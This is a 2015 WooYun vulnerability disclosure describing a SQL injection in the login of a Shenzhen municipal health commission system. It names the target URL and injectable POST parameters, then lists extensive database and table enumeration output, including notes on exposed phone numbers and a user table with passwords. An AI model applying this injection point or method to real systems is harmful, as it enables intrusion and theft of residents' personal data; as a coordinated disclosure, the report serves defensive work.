深圳市某委员会系统存在SQL注射导致上千表泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0112065

漏洞标题：深圳市某委员会系统存在SQL注射导致上千表泄露

漏洞作者： Yang

提交时间：2015-05-22 12:05

修复时间：2015-07-10 10:22

公开时间：2015-07-10 10:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-22：细节已通知厂商并且等待厂商处理中
2015-05-26：厂商已经确认，细节仅向厂商公开
2015-06-05：细节向核心白帽子及相关领域专家公开
2015-06-15：细节向普通白帽子公开
2015-06-25：细节向实习白帽子公开
2015-07-10：细节向公众公开

简要描述：

RT
大米手机摔破了怎么办
现在才知道英文不好才要命

详细说明：

深圳市卫生和计划生育委员会科教管理信息系统
存在POST注射
http://ky.szhpfpc.gov.cn/main (POST)
method=login&fid=login&login_id=88952634&login=%EF%BF%BD%EF%BF%BD%C2%BC&password=8895263

一个一个洞慢慢来

back-end DBMS: Microsoft SQL Server 2005
available databases [16]:
[*] Bsoft_HCN
[*] DB_CustomSMS_SGIP
[*] DB_CustomSmS_SMGP
[*] dcan
[*] jjm
[*] master
[*] mic
[*] model
[*] msdb
[*] sms
[*] sysoa
[*] SZDC
[*] tempdb
[*] WEBSERVER_SMS
[*] wsec
[*] zy

第一个库：[*] Bsoft_HCN 【貌似是一个创业软件】

Database: Bsoft_HCN
[30 tables]
+-----------------------+
| HCN_APP_INFO          |
| HCN_AUTH_INFO         |
| HCN_CARD_INFO         |
| HCN_CARD_MODULE_PARAM |
| HCN_CARD_MODULE_PARAM |
| HCN_CARD_PARAM        |
| HCN_DICTORY           |
| HCN_GATEWAY_INFO      |
| HCN_MESSAGE_STATDONE  |
| HCN_MESSAGE_STATDONE  |
| HCN_NODE_INFO         |
| HCN_SCHEMA_MAP        |
| HCN_SERVICE_INFO      |
| HCN_SYS_PARAM         |
| HCN_TOPIC_INFO        |
| HCN_TOPIC_SUB_INFO    |
| MESSAGE_20060810      |
| MESSAGE_20060811      |
| MESSAGE_20060813      |
| MESSAGE_20060814      |
| MESSAGE_20060815      |
| MESSAGE_20071107      |
| MESSAGE_20071109      |
| MESSAGE_20071111      |
| MESSAGE_20071113      |
| MESSAGE_20071114      |
| MESSAGE_20071228      |
| MESSAGE_20071229      |
| MESSAGE_20071230      |
| dtproperties          |
+-----------------------+
Database: Bsoft_HCN
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| dbo.MESSAGE_20071229      | 97366   |
| dbo.MESSAGE_20071230      | 55657   |
| dbo.MESSAGE_20071113      | 38678   |
| dbo.MESSAGE_20071228      | 15182   |
| dbo.MESSAGE_20071114      | 12502   |
| dbo.MESSAGE_20060811      | 2554    |
| dbo.MESSAGE_20060814      | 1814    |
| dbo.MESSAGE_20060815      | 1643    |
| dbo.MESSAGE_20060813      | 588     |
| dbo.MESSAGE_20071111      | 508     |
| dbo.MESSAGE_20071109      | 195     |
| dbo.HCN_AUTH_INFO         | 49      |
| dbo.HCN_CARD_PARAM        | 37      |
| dbo.HCN_SERVICE_INFO      | 27      |
| dbo.HCN_CARD_INFO         | 24      |
| dbo.MESSAGE_20071107      | 16      |
| dbo.HCN_MESSAGE_STATDONE  | 13      |
| dbo.HCN_MESSAGE_STATDONE  | 13      |
| dbo.HCN_DICTORY           | 11      |
| dbo.HCN_SYS_PARAM         | 11      |
| dbo.HCN_APP_INFO          | 7       |
| dbo.HCN_CARD_MODULE_PARAM | 3       |
| dbo.HCN_CARD_MODULE_PARAM | 3       |
| dbo.HCN_NODE_INFO         | 2       |
| dbo.MESSAGE_20060810      | 2       |
| dbo.HCN_GATEWAY_INFO      | 1       |
+---------------------------+---------+


不知道是啥东西

第二个库
sms

[824 tables]
+----------------------------+
| Campaign_list              |
| Campaign_list              |
| DYHIKEMESSAGES             |
| DYHIKEMOMESSAGES           |
| UsrSMSlog                  |
| action_mobile              |
| add_mobile_copy            |
| add_mobile_copy            |
| addr_book_group            |
| addr_book_group            |
| addr_book_jz               |
| addr_group                 |
| atom_func                  |
| charge_value               |
| check_action_temp          |
| check_action_temp          |
| check_award                |
| dept                       |
| dir_share                  |
| direct                     |
| dtproperties               |
| fliterRules                |
| fliterSMS                  |
| jy_shangxing               |
| menu_func                  |
| mess_sample                |
| message                    |
| mobile_db                  |
| msn_help                   |
| mtc_t                      |
| mtc_v                      |
| net_file                   |
| order_audit                |
| order_info                 |
| order_mess                 |
| order_out                  |
| reply_type                 |
| reply_type                 |
| role_menu                  |
| roles                      |
| smresult_01                |
| smresult_01                |
| smresult_02                |
| smresult_03                |
| smresult_04                |
| smresult_05                |
| smresult_06                |
| smresult_07                |
| smresult_08                |
| smresult_09                |
| smresult_10                |
| smresult_11                |
| smresult_12                |
| statement_account          |
| sysdiagrams                |
| tbl_MMResult_0101          |
| tbl_MMResult_0102          |
| tbl_MMResult_0103          |
| tbl_MMResult_0104          |
| tbl_MMResult_0105          |
| tbl_MMResult_0106          |
| tbl_MMResult_0107          |
| tbl_MMResult_0108          |
| tbl_MMResult_0109          |
| tbl_MMResult_0110          |
| tbl_MMResult_0111          |
| tbl_MMResult_0112          |
| tbl_MMResult_0113          |
| tbl_MMResult_0114          |
| tbl_MMResult_0115          |
| tbl_MMResult_0116          |
| tbl_MMResult_0117          |
| tbl_MMResult_0118          |
| tbl_MMResult_0119          |
| tbl_MMResult_0120          |
| tbl_MMResult_0121          |
| tbl_MMResult_0122          |
| tbl_MMResult_0123          |
| tbl_MMResult_0124          |
| tbl_MMResult_0125          |
| tbl_MMResult_0126          |
| tbl_MMResult_0127          |
| tbl_MMResult_0128          |
| tbl_MMResult_0129          |
| tbl_MMResult_0130          |
| tbl_MMResult_0131          |
| tbl_MMResult_0201          |
| tbl_MMResult_0202          |
| tbl_MMResult_0203          |
| tbl_MMResult_0204          |
| tbl_MMResult_0205          |
| tbl_MMResult_0206          |
| tbl_MMResult_0207          |
| tbl_MMResult_0208          |
| tbl_MMResult_0209          |
| tbl_MMResult_0210          |
| tbl_MMResult_0211          |
| tbl_MMResult_0212          |
| tbl_MMResult_0213          |
| tbl_MMResult_0214          |
| tbl_MMResult_0215          |
| tbl_MMResult_0216          |
| tbl_MMResult_0217          |
| tbl_MMResult_0218          |
| tbl_MMResult_0219          |
| tbl_MMResult_0220          |
| tbl_MMResult_0221          |
| tbl_MMResult_0222          |
| tbl_MMResult_0223          |
| tbl_MMResult_0224          |
| tbl_MMResult_0225          |
| tbl_MMResult_0226          |
| tbl_MMResult_0227          |
| tbl_MMResult_0228          |
| tbl_MMResult_0229          |
| tbl_MMResult_0301          |
| tbl_MMResult_0302          |
| tbl_MMResult_0303          |
| tbl_MMResult_0304          |
| tbl_MMResult_0305          |
| tbl_MMResult_0306          |
| tbl_MMResult_0307          |
| tbl_MMResult_0308          |
| tbl_MMResult_0309          |
| tbl_MMResult_0310          |
| tbl_MMResult_0311          |
| tbl_MMResult_0312          |
| tbl_MMResult_0313          |
| tbl_MMResult_0314          |
| tbl_MMResult_0315          |
| tbl_MMResult_0316          |
| tbl_MMResult_0317          |
| tbl_MMResult_0318          |
| tbl_MMResult_0319          |
| tbl_MMResult_0320          |
| tbl_MMResult_0321          |
| tbl_MMResult_0322          |
| tbl_MMResult_0323          |
| tbl_MMResult_0324          |
| tbl_MMResult_0325          |
| tbl_MMResult_0326          |
| tbl_MMResult_0327          |
| tbl_MMResult_0328          |
| tbl_MMResult_0329          |
| tbl_MMResult_0330          |
| tbl_MMResult_0331          |
| tbl_MMResult_0401          |
| tbl_MMResult_0402          |
| tbl_MMResult_0403          |
| tbl_MMResult_0404          |
| tbl_MMResult_0405          |
| tbl_MMResult_0406          |
| tbl_MMResult_0407          |
| tbl_MMResult_0408          |
| tbl_MMResult_0409          |
| tbl_MMResult_0410          |
| tbl_MMResult_0411          |
| tbl_MMResult_0412          |
| tbl_MMResult_0413          |
| tbl_MMResult_0414          |
| tbl_MMResult_0415          |
| tbl_MMResult_0416          |
| tbl_MMResult_0417          |
| tbl_MMResult_0418          |
| tbl_MMResult_0419          |
| tbl_MMResult_0420          |
| tbl_MMResult_0421          |
| tbl_MMResult_0422          |
| tbl_MMResult_0423          |
| tbl_MMResult_0424          |
| tbl_MMResult_0425          |
| tbl_MMResult_0426          |
| tbl_MMResult_0427          |
| tbl_MMResult_0428          |
| tbl_MMResult_0429          |
| tbl_MMResult_0430          |
| tbl_MMResult_0501          |
| tbl_MMResult_0502          |
| tbl_MMResult_0503          |
| tbl_MMResult_0504          |
| tbl_MMResult_0505          |
| tbl_MMResult_0506          |
| tbl_MMResult_0507          |
| tbl_MMResult_0508          |
| tbl_MMResult_0509          |
| tbl_MMResult_0510          |
| tbl_MMResult_0511          |
| tbl_MMResult_0512          |
| tbl_MMResult_0513          |
| tbl_MMResult_0514          |
| tbl_MMResult_0515          |
| tbl_MMResult_0516          |
| tbl_MMResult_0517          |
| tbl_MMResult_0518          |
| tbl_MMResult_0519          |
| tbl_MMResult_0520          |
| tbl_MMResult_0521          |
| tbl_MMResult_0522          |
| tbl_MMResult_0523          |
| tbl_MMResult_0524          |
| tbl_MMResult_0525          |
| tbl_MMResult_0526          |
| tbl_MMResult_0527          |
| tbl_MMResult_0528          |
| tbl_MMResult_0529          |
| tbl_MMResult_0530          |
| tbl_MMResult_0531          |
| tbl_MMResult_0601          |
| tbl_MMResult_0602          |
| tbl_MMResult_0603          |
| tbl_MMResult_0604          |
| tbl_MMResult_0605          |
| tbl_MMResult_0606          |
| tbl_MMResult_0607          |
| tbl_MMResult_0608          |
| tbl_MMResult_0609          |
| tbl_MMResult_0610          |
| tbl_MMResult_0611          |
| tbl_MMResult_0612          |
| tbl_MMResult_0613          |
| tbl_MMResult_0614          |
| tbl_MMResult_0615          |
| tbl_MMResult_0616          |
| tbl_MMResult_0617          |
| tbl_MMResult_0618          |
| tbl_MMResult_0619          |
| tbl_MMResult_0620          |
| tbl_MMResult_0621          |
| tbl_MMResult_0622          |
| tbl_MMResult_0623          |
| tbl_MMResult_0624          |
| tbl_MMResult_0625          |
| tbl_MMResult_0626          |
| tbl_MMResult_0627          |
| tbl_MMResult_0628          |
| tbl_MMResult_0629          |
| tbl_MMResult_0630          |
| tbl_MMResult_0701          |
| tbl_MMResult_0702          |
| tbl_MMResult_0703          |
| tbl_MMResult_0704          |
| tbl_MMResult_0705          |
| tbl_MMResult_0706          |
| tbl_MMResult_0707          |
| tbl_MMResult_0708          |
| tbl_MMResult_0709          |
| tbl_MMResult_0710          |
| tbl_MMResult_0711          |
| tbl_MMResult_0712          |
| tbl_MMResult_0713          |
| tbl_MMResult_0714          |
| tbl_MMResult_0715          |
| tbl_MMResult_0716          |
| tbl_MMResult_0717          |
| tbl_MMResult_0718          |
| tbl_MMResult_0719          |
| tbl_MMResult_0720          |
| tbl_MMResult_0721          |
| tbl_MMResult_0722          |
| tbl_MMResult_0723          |
| tbl_MMResult_0724          |
| tbl_MMResult_0725          |
| tbl_MMResult_0726          |
| tbl_MMResult_0727          |
| tbl_MMResult_0728          |
| tbl_MMResult_0729          |
| tbl_MMResult_0730          |
| tbl_MMResult_0731          |
| tbl_MMResult_0801          |
| tbl_MMResult_0802          |
| tbl_MMResult_0803          |
| tbl_MMResult_0804          |
| tbl_MMResult_0805          |
| tbl_MMResult_0806          |
| tbl_MMResult_0807          |
| tbl_MMResult_0808          |
| tbl_MMResult_0809          |
| tbl_MMResult_0810          |
| tbl_MMResult_0811          |
| tbl_MMResult_0812          |
| tbl_MMResult_0813          |
| tbl_MMResult_0814          |
| tbl_MMResult_0815          |
| tbl_MMResult_0816          |
| tbl_MMResult_0817          |
| tbl_MMResult_0818          |
| tbl_MMResult_0819          |
| tbl_MMResult_0820          |
| tbl_MMResult_0821          |
| tbl_MMResult_0822          |
| tbl_MMResult_0823          |
| tbl_MMResult_0824          |
| tbl_MMResult_0825          |
| tbl_MMResult_0826          |
| tbl_MMResult_0827          |
| tbl_MMResult_0828          |
| tbl_MMResult_0829          |
| tbl_MMResult_0830          |
| tbl_MMResult_0831          |
| tbl_MMResult_0901          |
| tbl_MMResult_0902          |
| tbl_MMResult_0903          |
| tbl_MMResult_0904          |
| tbl_MMResult_0905          |
| tbl_MMResult_0906          |
| tbl_MMResult_0907          |
| tbl_MMResult_0908          |
| tbl_MMResult_0909          |
| tbl_MMResult_0910          |
| tbl_MMResult_0911          |
| tbl_MMResult_0912          |
| tbl_MMResult_0913          |
| tbl_MMResult_0914          |
| tbl_MMResult_0915          |
| tbl_MMResult_0916          |
| tbl_MMResult_0917          |
| tbl_MMResult_0918          |
| tbl_MMResult_0919          |
| tbl_MMResult_0920          |
| tbl_MMResult_0921          |
| tbl_MMResult_0922          |
| tbl_MMResult_0923          |
| tbl_MMResult_0924          |
| tbl_MMResult_0925          |
| tbl_MMResult_0926          |
| tbl_MMResult_0927          |
| tbl_MMResult_0928          |
| tbl_MMResult_0929          |
| tbl_MMResult_0930          |
| tbl_MMResult_1001          |
| tbl_MMResult_1002          |
| tbl_MMResult_1003          |
| tbl_MMResult_1004          |
| tbl_MMResult_1005          |
| tbl_MMResult_1006          |
| tbl_MMResult_1007          |
| tbl_MMResult_1008          |
| tbl_MMResult_1009          |
| tbl_MMResult_1010          |
| tbl_MMResult_1011          |
| tbl_MMResult_1012          |
| tbl_MMResult_1013          |
| tbl_MMResult_1014          |
| tbl_MMResult_1015          |
| tbl_MMResult_1016          |
| tbl_MMResult_1017          |
| tbl_MMResult_1018          |
| tbl_MMResult_1019          |
| tbl_MMResult_1020          |
| tbl_MMResult_1021          |
| tbl_MMResult_1022          |
| tbl_MMResult_1023          |
| tbl_MMResult_1024          |
| tbl_MMResult_1025          |
| tbl_MMResult_1026          |
| tbl_MMResult_1027          |
| tbl_MMResult_1028          |
| tbl_MMResult_1029          |
| tbl_MMResult_1030          |
| tbl_MMResult_1031          |
| tbl_MMResult_1101          |
| tbl_MMResult_1102          |
| tbl_MMResult_1103          |
| tbl_MMResult_1104          |
| tbl_MMResult_1105          |
| tbl_MMResult_1106          |
| tbl_MMResult_1107          |
| tbl_MMResult_1108          |
| tbl_MMResult_1109          |
| tbl_MMResult_1110          |
| tbl_MMResult_1111          |
| tbl_MMResult_1112          |
| tbl_MMResult_1113          |
| tbl_MMResult_1114          |
| tbl_MMResult_1115          |
| tbl_MMResult_1116          |
| tbl_MMResult_1117          |
| tbl_MMResult_1118          |
| tbl_MMResult_1119          |
| tbl_MMResult_1120          |
| tbl_MMResult_1121          |
| tbl_MMResult_1122          |
| tbl_MMResult_1123          |
| tbl_MMResult_1124          |
| tbl_MMResult_1125          |
| tbl_MMResult_1126          |
| tbl_MMResult_1127          |
| tbl_MMResult_1128          |
| tbl_MMResult_1129          |
| tbl_MMResult_1130          |
| tbl_MMResult_1201          |
| tbl_MMResult_1202          |
| tbl_MMResult_1203          |
| tbl_MMResult_1204          |
| tbl_MMResult_1205          |
| tbl_MMResult_1206          |
| tbl_MMResult_1207          |
| tbl_MMResult_1208          |
| tbl_MMResult_1209          |
| tbl_MMResult_1210          |
| tbl_MMResult_1211          |
| tbl_MMResult_1212          |
| tbl_MMResult_1213          |
| tbl_MMResult_1214          |
| tbl_MMResult_1215          |
| tbl_MMResult_1216          |
| tbl_MMResult_1217          |
| tbl_MMResult_1218          |
| tbl_MMResult_1219          |
| tbl_MMResult_1220          |
| tbl_MMResult_1221          |
| tbl_MMResult_1222          |
| tbl_MMResult_1223          |
| tbl_MMResult_1224          |
| tbl_MMResult_1225          |
| tbl_MMResult_1226          |
| tbl_MMResult_1227          |
| tbl_MMResult_1228          |
| tbl_MMResult_1229          |
| tbl_MMResult_1230          |
| tbl_MMResult_1231          |
| tbl_MMSingleSendContent    |
| tbl_MMSingleSendContent    |
| tbl_Member                 |
| tbl_MusicManager           |
| tbl_MusicTypeManager       |
| tbl_Operator               |
| tbl_PerformanceInfo        |
| tbl_PicManager             |
| tbl_PicTypeManager         |
| tbl_ReceiveMMSContent      |
| tbl_ReceiveMMSContent      |
| tbl_ResultNotify           |
| tbl_RoleJoinAuthority      |
| tbl_SMReceived             |
| tbl_SMResult_0101          |
| tbl_SMResult_0101          |
| tbl_SMResult_0102          |
| tbl_SMResult_0103          |
| tbl_SMResult_0104          |
| tbl_SMResult_0105          |
| tbl_SMResult_0106          |
| tbl_SMResult_0107          |
| tbl_SMResult_0108          |
| tbl_SMResult_0109          |
| tbl_SMResult_0110          |
| tbl_SMResult_0111          |
| tbl_SMResult_0112          |
| tbl_SMResult_0113          |
| tbl_SMResult_0114          |
| tbl_SMResult_0115          |
| tbl_SMResult_0116          |
| tbl_SMResult_0117          |
| tbl_SMResult_0118          |
| tbl_SMResult_0119          |
| tbl_SMResult_0120          |
| tbl_SMResult_0121          |
| tbl_SMResult_0122          |
| tbl_SMResult_0123          |
| tbl_SMResult_0124          |
| tbl_SMResult_0125          |
| tbl_SMResult_0126          |
| tbl_SMResult_0127          |
| tbl_SMResult_0128          |
| tbl_SMResult_0129          |
| tbl_SMResult_0130          |
| tbl_SMResult_0131          |
| tbl_SMResult_0201          |
| tbl_SMResult_0202          |
| tbl_SMResult_0203          |
| tbl_SMResult_0204          |
| tbl_SMResult_0205          |
| tbl_SMResult_0206          |
| tbl_SMResult_0207          |
| tbl_SMResult_0208          |
| tbl_SMResult_0209          |
| tbl_SMResult_0210          |
| tbl_SMResult_0211          |
| tbl_SMResult_0212          |
| tbl_SMResult_0213          |
| tbl_SMResult_0214          |
| tbl_SMResult_0215          |
| tbl_SMResult_0216          |
| tbl_SMResult_0217          |
| tbl_SMResult_0218          |
| tbl_SMResult_0219          |
| tbl_SMResult_0220          |
| tbl_SMResult_0221          |
| tbl_SMResult_0222          |
| tbl_SMResult_0223          |
| tbl_SMResult_0224          |
| tbl_SMResult_0225          |
| tbl_SMResult_0226          |
| tbl_SMResult_0227          |
| tbl_SMResult_0228          |
| tbl_SMResult_0229          |
| tbl_SMResult_0301          |
| tbl_SMResult_0302          |
| tbl_SMResult_0303          |
| tbl_SMResult_0304          |
| tbl_SMResult_0305          |
| tbl_SMResult_0306          |
| tbl_SMResult_0307          |
| tbl_SMResult_0308          |
| tbl_SMResult_0309          |
| tbl_SMResult_0310          |
| tbl_SMResult_0311          |
| tbl_SMResult_0312          |
| tbl_SMResult_0313          |
| tbl_SMResult_0314          |
| tbl_SMResult_0315          |
| tbl_SMResult_0316          |
| tbl_SMResult_0317          |
| tbl_SMResult_0318          |
| tbl_SMResult_0319          |
| tbl_SMResult_0320          |
| tbl_SMResult_0321          |
| tbl_SMResult_0322          |
| tbl_SMResult_0323          |
| tbl_SMResult_0324          |
| tbl_SMResult_0325          |
| tbl_SMResult_0326          |
| tbl_SMResult_0327          |
| tbl_SMResult_0328          |
| tbl_SMResult_0329          |
| tbl_SMResult_0330          |
| tbl_SMResult_0331          |
| tbl_SMResult_0401          |
| tbl_SMResult_0402          |
| tbl_SMResult_0403          |
| tbl_SMResult_0404          |
| tbl_SMResult_0405          |
| tbl_SMResult_0406          |
| tbl_SMResult_0407          |
| tbl_SMResult_0408          |
| tbl_SMResult_0409          |
| tbl_SMResult_0410          |
| tbl_SMResult_0411          |
| tbl_SMResult_0412          |
| tbl_SMResult_0413          |
| tbl_SMResult_0414          |
| tbl_SMResult_0415          |
| tbl_SMResult_0416          |
| tbl_SMResult_0417          |
| tbl_SMResult_0418          |
| tbl_SMResult_0419          |
| tbl_SMResult_0420          |
| tbl_SMResult_0421          |
| tbl_SMResult_0422          |
| tbl_SMResult_0423          |
| tbl_SMResult_0424          |
| tbl_SMResult_0425          |
| tbl_SMResult_0426          |
| tbl_SMResult_0427          |
| tbl_SMResult_0428          |
| tbl_SMResult_0429          |
| tbl_SMResult_0430          |
| tbl_SMResult_0501          |
| tbl_SMResult_0502          |
| tbl_SMResult_0503          |
| tbl_SMResult_0504          |
| tbl_SMResult_0505          |
| tbl_SMResult_0506          |
| tbl_SMResult_0507          |
| tbl_SMResult_0508          |
| tbl_SMResult_0509          |
| tbl_SMResult_0510          |
| tbl_SMResult_0511          |
| tbl_SMResult_0512          |
| tbl_SMResult_0513          |
| tbl_SMResult_0514          |
| tbl_SMResult_0515          |
| tbl_SMResult_0516          |
| tbl_SMResult_0517          |
| tbl_SMResult_0518          |
| tbl_SMResult_0519          |
| tbl_SMResult_0520          |
| tbl_SMResult_0521          |
| tbl_SMResult_0522          |
| tbl_SMResult_0523          |
| tbl_SMResult_0524          |
| tbl_SMResult_0525          |
| tbl_SMResult_0526          |
| tbl_SMResult_0527          |
| tbl_SMResult_0528          |
| tbl_SMResult_0529          |
| tbl_SMResult_0530          |
| tbl_SMResult_0531          |
| tbl_SMResult_0601          |
| tbl_SMResult_0602          |
| tbl_SMResult_0603          |
| tbl_SMResult_0604          |
| tbl_SMResult_0605          |
| tbl_SMResult_0606          |
| tbl_SMResult_0607          |
| tbl_SMResult_0608          |
| tbl_SMResult_0609          |
| tbl_SMResult_0610          |
| tbl_SMResult_0611          |
| tbl_SMResult_0612          |
| tbl_SMResult_0613          |
| tbl_SMResult_0614          |
| tbl_SMResult_0615          |
| tbl_SMResult_0616          |
| tbl_SMResult_0617          |
| tbl_SMResult_0618          |
| tbl_SMResult_0619          |
| tbl_SMResult_0620          |
| tbl_SMResult_0621          |
| tbl_SMResult_0622          |
| tbl_SMResult_0623          |
| tbl_SMResult_0624          |
| tbl_SMResult_0625          |
| tbl_SMResult_0626          |
| tbl_SMResult_0627          |
| tbl_SMResult_0628          |
| tbl_SMResult_0629          |
| tbl_SMResult_0630          |
| tbl_SMResult_0701          |
| tbl_SMResult_0702          |
| tbl_SMResult_0703          |
| tbl_SMResult_0704          |
| tbl_SMResult_0705          |
| tbl_SMResult_0706          |
| tbl_SMResult_0707          |
| tbl_SMResult_0708          |
| tbl_SMResult_0709          |
| tbl_SMResult_0710          |
| tbl_SMResult_0711          |
| tbl_SMResult_0712          |
| tbl_SMResult_0713          |
| tbl_SMResult_0714          |
| tbl_SMResult_0715          |
| tbl_SMResult_0716          |
| tbl_SMResult_0717          |
| tbl_SMResult_0718          |
| tbl_SMResult_0719          |
| tbl_SMResult_0720          |
| tbl_SMResult_0721          |
| tbl_SMResult_0722          |
| tbl_SMResult_0723          |
| tbl_SMResult_0724          |
| tbl_SMResult_0725          |
| tbl_SMResult_0726          |
| tbl_SMResult_0727          |
| tbl_SMResult_0728          |
| tbl_SMResult_0729          |
| tbl_SMResult_0730          |
| tbl_SMResult_0731          |
| tbl_SMResult_0801          |
| tbl_SMResult_0802          |
| tbl_SMResult_0803          |
| tbl_SMResult_0804          |
| tbl_SMResult_0805          |
| tbl_SMResult_0806          |
| tbl_SMResult_0807          |
| tbl_SMResult_0808          |
| tbl_SMResult_0809          |
| tbl_SMResult_0810          |
| tbl_SMResult_0811          |
| tbl_SMResult_0812          |
| tbl_SMResult_0813          |
| tbl_SMResult_0814          |
| tbl_SMResult_0815          |
| tbl_SMResult_0816          |
| tbl_SMResult_0817          |
| tbl_SMResult_0818          |
| tbl_SMResult_0819          |
| tbl_SMResult_0820          |
| tbl_SMResult_0821          |
| tbl_SMResult_0822          |
| tbl_SMResult_0823          |
| tbl_SMResult_0824          |
| tbl_SMResult_0825          |
| tbl_SMResult_0826          |
| tbl_SMResult_0827          |
| tbl_SMResult_0828          |
| tbl_SMResult_0829          |
| tbl_SMResult_0830          |
| tbl_SMResult_0831          |
| tbl_SMResult_0901          |
| tbl_SMResult_0902          |
| tbl_SMResult_0903          |
| tbl_SMResult_0904          |
| tbl_SMResult_0905          |
| tbl_SMResult_0906          |
| tbl_SMResult_0907          |
| tbl_SMResult_0908          |
| tbl_SMResult_0909          |
| tbl_SMResult_0910          |
| tbl_SMResult_0911          |
| tbl_SMResult_0912          |
| tbl_SMResult_0913          |
| tbl_SMResult_0914          |
| tbl_SMResult_0915          |
| tbl_SMResult_0916          |
| tbl_SMResult_0917          |
| tbl_SMResult_0918          |
| tbl_SMResult_0919          |
| tbl_SMResult_0920          |
| tbl_SMResult_0921          |
| tbl_SMResult_0922          |
| tbl_SMResult_0923          |
| tbl_SMResult_0924          |
| tbl_SMResult_0925          |
| tbl_SMResult_0926          |
| tbl_SMResult_0927          |
| tbl_SMResult_0928          |
| tbl_SMResult_0929          |
| tbl_SMResult_0930          |
| tbl_SMResult_1001          |
| tbl_SMResult_1002          |
| tbl_SMResult_1003          |
| tbl_SMResult_1004          |
| tbl_SMResult_1005          |
| tbl_SMResult_1006          |
| tbl_SMResult_1007          |
| tbl_SMResult_1008          |
| tbl_SMResult_1009          |
| tbl_SMResult_1010          |
| tbl_SMResult_1011          |
| tbl_SMResult_1012          |
| tbl_SMResult_1013          |
| tbl_SMResult_1014          |
| tbl_SMResult_1015          |
| tbl_SMResult_1016          |
| tbl_SMResult_1017          |
| tbl_SMResult_1018          |
| tbl_SMResult_1019          |
| tbl_SMResult_1020          |
| tbl_SMResult_1021          |
| tbl_SMResult_1022          |
| tbl_SMResult_1023          |
| tbl_SMResult_1024          |
| tbl_SMResult_1025          |
| tbl_SMResult_1026          |
| tbl_SMResult_1027          |
| tbl_SMResult_1028          |
| tbl_SMResult_1029          |
| tbl_SMResult_1030          |
| tbl_SMResult_1031          |
| tbl_SMResult_1101          |
| tbl_SMResult_1102          |
| tbl_SMResult_1103          |
| tbl_SMResult_1104          |
| tbl_SMResult_1105          |
| tbl_SMResult_1106          |
| tbl_SMResult_1107          |
| tbl_SMResult_1108          |
| tbl_SMResult_1109          |
| tbl_SMResult_1110          |
| tbl_SMResult_1111          |
| tbl_SMResult_1112          |
| tbl_SMResult_1113          |
| tbl_SMResult_1114          |
| tbl_SMResult_1115          |
| tbl_SMResult_1116          |
| tbl_SMResult_1117          |
| tbl_SMResult_1118          |
| tbl_SMResult_1119          |
| tbl_SMResult_1120          |
| tbl_SMResult_1121          |
| tbl_SMResult_1122          |
| tbl_SMResult_1123          |
| tbl_SMResult_1124          |
| tbl_SMResult_1125          |
| tbl_SMResult_1126          |
| tbl_SMResult_1127          |
| tbl_SMResult_1128          |
| tbl_SMResult_1129          |
| tbl_SMResult_1130          |
| tbl_SMResult_1201          |
| tbl_SMResult_1202          |
| tbl_SMResult_1203          |
| tbl_SMResult_1204          |
| tbl_SMResult_1205          |
| tbl_SMResult_1206          |
| tbl_SMResult_1207          |
| tbl_SMResult_1208          |
| tbl_SMResult_1209          |
| tbl_SMResult_1210          |
| tbl_SMResult_1211          |
| tbl_SMResult_1212          |
| tbl_SMResult_1213          |
| tbl_SMResult_1214          |
| tbl_SMResult_1215          |
| tbl_SMResult_1216          |
| tbl_SMResult_1217          |
| tbl_SMResult_1218          |
| tbl_SMResult_1219          |
| tbl_SMResult_1220          |
| tbl_SMResult_1221          |
| tbl_SMResult_1222          |
| tbl_SMResult_1223          |
| tbl_SMResult_1224          |
| tbl_SMResult_1225          |
| tbl_SMResult_1226          |
| tbl_SMResult_1227          |
| tbl_SMResult_1228          |
| tbl_SMResult_1229          |
| tbl_SMResult_1230          |
| tbl_SMResult_1231          |
| tbl_SMSendTask_back        |
| tbl_Smsendtask_bak_2012    |
| tbl_Smsendtask_bak_2012    |
| tbl_smsendtask0416         |
| tbl_smsendtask0629_bak     |
| tbl_smsendtask_0331        |
| tbl_smsendtask_0331        |
| tbl_smsendtask_0806        |
| tbl_smsendtask_091121bak   |
| tbl_smsendtask_0928        |
| tbl_smsendtask_1029        |
| tbl_smsendtask_1113        |
| tbl_smsendtask_1114        |
| tbl_smsendtask_11202       |
| tbl_smsendtask_1202        |
| tbl_smsendtask_2011        |
| tbl_smsendtask_errormobile |
| tbl_sysconfig              |
| users                      |
| usr_role                   |
| vote_rec_group             |
| vote_rec_group             |
+----------------------------+

都是关于短信的吧
| dbo.tbl_SMReceived | 535133 |
那泄露五十万个号码

users

又有邮箱又有密码又有号码
第三个库

back-end DBMS: Microsoft SQL Server 2005
Database: zy
[55 tables]
+------------------------+
| P_NEWS009              |
| P_NEWS010              |
| P_NEWS011              |
| P_NEWS012              |
| P_NEWS013              |
| P_NEWS017              |
| P_VOTE001              |
| P_VOTE002              |
| P_VOTE003              |
| P_VOTE004              |
| atom_func              |
| bbs_affiche            |
| bbs_class              |
| bbs_forum              |
| bbs_level              |
| bbs_sys_affiche        |
| bbs_thesis_state       |
| bbs_thesis_state       |
| bbs_userface           |
| bbs_userface           |
| dept                   |
| doctor                 |
| download               |
| dtproperties           |
| gov_dept               |
| h_dept                 |
| leader                 |
| menu_func              |
| mtc_t                  |
| mtc_v                  |
| news_dept_auth         |
| news_dept_auth         |
| news_read_log          |
| news_right             |
| news_type              |
| news_usr_auth          |
| online_question        |
| province_code          |
| public_question_assign |
| public_question_assign |
| public_question_audit  |
| public_question_dept   |
| public_question_mtc    |
| public_question_reply  |
| public_question_return |
| public_question_right  |
| read_log               |
| role_menu              |
| roles                  |
| serv_item              |
| users                  |
| usr_role               |
| vote                   |
| white_board_recv       |
| white_board_recv       |
+------------------------+
Database: zy
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.serv_item              | 200     |
| dbo.news_right             | 124     |
| dbo.role_menu              | 96      |
| dbo.news_type              | 67      |
| dbo.usr_role               | 46      |
| dbo.atom_func              | 39      |
| dbo.mtc_t                  | 30      |
| dbo.P_NEWS013              | 30      |
| dbo.menu_func              | 25      |
| dbo.download               | 24      |
| dbo.public_question_reply  | 18      |
| dbo.P_VOTE002              | 15      |
| dbo.P_VOTE004              | 15      |
| dbo.roles                  | 14      |
| dbo.public_question_mtc    | 13      |
